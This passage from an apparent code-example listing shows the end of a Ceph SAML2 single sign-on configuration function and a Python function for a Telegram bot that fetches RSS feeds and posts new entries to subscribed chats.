                "wantAssertionsEncrypted": has_sp_cert,
                "wantNameIdEncrypted": False,  # Not all Identity Providers support this.
                "metadataValidUntil": '',
                "wantAttributeStatement": False
            }
        }
        settings = Saml2Parser.merge_settings(settings, idp_settings)
        mgr.SSO_DB.saml2.onelogin_settings = settings
        mgr.SSO_DB.protocol = 'saml2'
        mgr.SSO_DB.save()
        return 0, json.dumps(mgr.SSO_DB.saml2.onelogin_settings), ''

    return -errno.ENOSYS, '', ''
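The branch above distinguishes remote IdP metadata from inline XML by the scheme (index 0 of the parse result); a short sketch with hypothetical inputs:

from urllib.parse import urlparse

assert urlparse('https://idp.example.org/metadata.xml')[0] == 'https'
assert urlparse('file:///etc/ceph/idp_metadata.xml')[0] == 'file'
assert urlparse('<EntityDescriptor entityID="...">')[0] == ''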
Example #60
0
def check_feed(bot, key):
    feed_url = re.match("^" + feed_hash.format("(.+):subs$"), key).group(1)
    logger.info(feed_url)
    data = feedparser.parse(feed_url)
    if "link" not in data.feed:
        if "status" in data and data["status"] != 200:
            logger.warning(_("{0} - Not a valid feed, got HTTP Code {1}").format(feed_url, data["status"]))
        else:
            logger.warning(_("{0} - Not a valid feed: {1}").format(feed_url, str(data.bozo_exception)))
        return None
    if "title" not in data.feed:
        feed_title = data.feed["link"]
    else:
        feed_title = data.feed["title"]
    last_entry_hash = feed_hash.format(feed_url + ":last_entry")
    last_entry = r.get(last_entry_hash)
    new_entries = utils.get_new_entries(data.entries, last_entry)
    for entry in reversed(new_entries):
        if "title" not in entry:
            post_title = _("No title")
        else:
            post_title = utils.remove_html_tags(entry["title"]).strip()
            post_title = post_title.replace("<", "&lt;").replace(">", "&gt;")
        if "link" not in entry:
            post_link = data.link
            link_name = post_link
        else:
            post_link = entry.link
            feedproxy = re.search(r"^https?://feedproxy\.google\.com/~r/(.+?)/.*", post_link)  # feedproxy.google.com
            if feedproxy:
                link_name = feedproxy.group(1)
            else:
                link_name = urlparse(post_link).netloc
        link_name = re.sub(r"^www\d?\.", "", link_name)  # remove www.
        if "content" in entry:
            content = utils.get_content(entry.content[0]["value"])
        elif "summary" in entry:
            content = utils.get_content(entry.summary)
        else:
            content = ""
        text = "<b>{post_title}</b>\n<i>{feed_title}</i>\n{content}".format(
            post_title=post_title,
            feed_title=feed_title,
            content=content
        )
        readmore = _("Read more on {0}").format(link_name)
        text += "\n<a href=\"{post_link}\">{readmore}</a>\n".format(
            post_link=post_link,
            readmore=readmore
        )
        for member in r.smembers(key):
            try:
                bot.sendMessage(
                    chat_id=member,
                    text=text,
                    parse_mode=telegram.ParseMode.HTML,
                    disable_web_page_preview=True
                )
            except telegram.error.Unauthorized:
                logger.warning(_("Chat {0} doesn't exist anymore, will be deleted.").format(member))
                r.srem(key, member)
                r.delete(feed_hash.format(member))
            except telegram.error.ChatMigrated as new_chat:
                new_chat_id = new_chat.new_chat_id
                logger.info(_("Chat migrated: ") + member + " -> " + str(new_chat_id))
                r.srem(key, member)
                r.sadd(key, new_chat_id)
                r.rename(feed_hash.format(member), feed_hash.format(new_chat_id))
                bot.sendMessage(
                    chat_id=member,
                    text=text,
                    parse_mode=telegram.ParseMode.HTML,
                    disable_web_page_preview=True
                )
            except telegram.error.TimedOut:
                pass
            except telegram.error.BadRequest as exception:
                logger.error(exception)

    if not r.exists(key):
        r.delete(last_entry_hash)
        return

    # Set the new last entry if there are any
    if new_entries:
        if "id" not in new_entries[0]:
            new_last_entry = new_entries[0].link
        else:
            new_last_entry = new_entries[0].id
        r.set(last_entry_hash, new_last_entry)
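A minimal sketch (hypothetical link) of the netloc/"www." handling above, which derives a human-readable source name from a post link:

from urllib.parse import urlparse
import re

post_link = 'https://www.example-blog.org/2020/01/post.html'
link_name = urlparse(post_link).netloc            # 'www.example-blog.org'
link_name = re.sub(r'^www\d?\.', '', link_name)   # drop the leading 'www.'
assert link_name == 'example-blog.org'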